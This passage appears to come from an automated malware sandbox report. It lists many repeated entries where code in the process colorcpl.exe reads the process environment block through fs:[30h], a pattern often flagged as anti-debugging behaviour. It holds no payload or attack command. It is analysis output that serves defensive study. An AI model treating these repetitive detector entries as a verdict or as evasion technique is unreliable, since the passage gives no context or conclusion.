          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]1_2_06E27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]1_2_06E27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]1_2_06E27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]1_2_06E27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAE44 mov eax, dword ptr fs:[00000030h]1_2_06EDAE44
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAE44 mov eax, dword ptr fs:[00000030h]1_2_06EDAE44
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1E620 mov eax, dword ptr fs:[00000030h]1_2_06E1E620
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECFE3F mov eax, dword ptr fs:[00000030h]1_2_06ECFE3F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C600 mov eax, dword ptr fs:[00000030h]1_2_06E1C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C600 mov eax, dword ptr fs:[00000030h]1_2_06E1C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C600 mov eax, dword ptr fs:[00000030h]1_2_06E1C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E48E00 mov eax, dword ptr fs:[00000030h]1_2_06E48E00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1608 mov eax, dword ptr fs:[00000030h]1_2_06ED1608
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A61C mov eax, dword ptr fs:[00000030h]1_2_06E4A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A61C mov eax, dword ptr fs:[00000030h]1_2_06E4A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E537F5 mov eax, dword ptr fs:[00000030h]1_2_06E537F5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E28794 mov eax, dword ptr fs:[00000030h]1_2_06E28794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97794 mov eax, dword ptr fs:[00000030h]1_2_06E97794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97794 mov eax, dword ptr fs:[00000030h]1_2_06E97794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97794 mov eax, dword ptr fs:[00000030h]1_2_06E97794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2FF60 mov eax, dword ptr fs:[00000030h]1_2_06E2FF60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8F6A mov eax, dword ptr fs:[00000030h]1_2_06EE8F6A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2EF40 mov eax, dword ptr fs:[00000030h]1_2_06E2EF40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E14F2E mov eax, dword ptr fs:[00000030h]1_2_06E14F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E14F2E mov eax, dword ptr fs:[00000030h]1_2_06E14F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4E730 mov eax, dword ptr fs:[00000030h]1_2_06E4E730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B73D mov eax, dword ptr fs:[00000030h]1_2_06E3B73D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B73D mov eax, dword ptr fs:[00000030h]1_2_06E3B73D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE070D mov eax, dword ptr fs:[00000030h]1_2_06EE070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE070D mov eax, dword ptr fs:[00000030h]1_2_06EE070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A70E mov eax, dword ptr fs:[00000030h]1_2_06E4A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A70E mov eax, dword ptr fs:[00000030h]1_2_06E4A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3F716 mov eax, dword ptr fs:[00000030h]1_2_06E3F716
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAFF10 mov eax, dword ptr fs:[00000030h]1_2_06EAFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAFF10 mov eax, dword ptr fs:[00000030h]1_2_06EAFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED14FB mov eax, dword ptr fs:[00000030h]1_2_06ED14FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96CF0 mov eax, dword ptr fs:[00000030h]1_2_06E96CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96CF0 mov eax, dword ptr fs:[00000030h]1_2_06E96CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96CF0 mov eax, dword ptr fs:[00000030h]1_2_06E96CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8CD6 mov eax, dword ptr fs:[00000030h]1_2_06EE8CD6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2849B mov eax, dword ptr fs:[00000030h]1_2_06E2849B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3746D mov eax, dword ptr fs:[00000030h]1_2_06E3746D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]1_2_06E4AC7B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A44B mov eax, dword ptr fs:[00000030h]1_2_06E4A44B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAC450 mov eax, dword ptr fs:[00000030h]1_2_06EAC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAC450 mov eax, dword ptr fs:[00000030h]1_2_06EAC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4BC2C mov eax, dword ptr fs:[00000030h]1_2_06E4BC2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE740D mov eax, dword ptr fs:[00000030h]1_2_06EE740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE740D mov eax, dword ptr fs:[00000030h]1_2_06EE740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE740D mov eax, dword ptr fs:[00000030h]1_2_06EE740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]1_2_06E96C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]1_2_06E96C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]1_2_06E96C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]1_2_06E96C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]1_2_06ED1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2D5E0 mov eax, dword ptr fs:[00000030h]1_2_06E2D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2D5E0 mov eax, dword ptr fs:[00000030h]1_2_06E2D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]1_2_06EDFDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]1_2_06EDFDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]1_2_06EDFDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]1_2_06EDFDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC8DF1 mov eax, dword ptr fs:[00000030h]1_2_06EC8DF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]1_2_06E96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]1_2_06E96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]1_2_06E96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov ecx, dword ptr fs:[00000030h]1_2_06E96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]1_2_06E96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]1_2_06E96DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE05AC mov eax, dword ptr fs:[00000030h]1_2_06EE05AC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE05AC mov eax, dword ptr fs:[00000030h]1_2_06EE05AC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E435A1 mov eax, dword ptr fs:[00000030h]1_2_06E435A1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E41DB5 mov eax, dword ptr fs:[00000030h]1_2_06E41DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E41DB5 mov eax, dword ptr fs:[00000030h]1_2_06E41DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E41DB5 mov eax, dword ptr fs:[00000030h]1_2_06E41DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]1_2_06E42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]1_2_06E42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]1_2_06E42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]1_2_06E42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]1_2_06E12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]1_2_06E12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]1_2_06E12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]1_2_06E12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]1_2_06E12D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]1_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]1_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]1_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]1_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]1_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]1_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]1_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FD9B mov eax, dword ptr fs:[00000030h]1_2_06E4FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FD9B mov eax, dword ptr fs:[00000030h]1_2_06E4FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C577 mov eax, dword ptr fs:[00000030h]1_2_06E3C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C577 mov eax, dword ptr fs:[00000030h]1_2_06E3C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E53D43 mov eax, dword ptr fs:[00000030h]1_2_06E53D43
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93540 mov eax, dword ptr fs:[00000030h]1_2_06E93540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC3D40 mov eax, dword ptr fs:[00000030h]1_2_06EC3D40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E37D50 mov eax, dword ptr fs:[00000030h]1_2_06E37D50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AD30 mov eax, dword ptr fs:[00000030h]1_2_06E1AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDE539 mov eax, dword ptr fs:[00000030h]1_2_06EDE539
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]1_2_06E23D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8D34 mov eax, dword ptr fs:[00000030h]1_2_06EE8D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E9A537 mov eax, dword ptr fs:[00000030h]1_2_06E9A537
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44D3B mov eax, dword ptr fs:[00000030h]1_2_06E44D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44D3B mov eax, dword ptr fs:[00000030h]1_2_06E44D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44D3B mov eax, dword ptr fs:[00000030h]1_2_06E44D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42AE4 mov eax, dword ptr fs:[00000030h]1_2_06E42AE4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42ACB mov eax, dword ptr fs:[00000030h]1_2_06E42ACB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]1_2_06E152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2AAB0 mov eax, dword ptr fs:[00000030h]1_2_06E2AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2AAB0 mov eax, dword ptr fs:[00000030h]1_2_06E2AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FAB0 mov eax, dword ptr fs:[00000030h]1_2_06E4FAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4D294 mov eax, dword ptr fs:[00000030h]1_2_06E4D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4D294 mov eax, dword ptr fs:[00000030h]1_2_06E4D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECB260 mov eax, dword ptr fs:[00000030h]1_2_06ECB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECB260 mov eax, dword ptr fs:[00000030h]1_2_06ECB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8A62 mov eax, dword ptr fs:[00000030h]1_2_06EE8A62
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5927A mov eax, dword ptr fs:[00000030h]1_2_06E5927A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]1_2_06E19240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]1_2_06E19240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]1_2_06E19240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]1_2_06E19240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDEA55 mov eax, dword ptr fs:[00000030h]1_2_06EDEA55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EA4257 mov eax, dword ptr fs:[00000030h]1_2_06EA4257
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E54A2C mov eax, dword ptr fs:[00000030h]1_2_06E54A2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E54A2C mov eax, dword ptr fs:[00000030h]1_2_06E54A2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
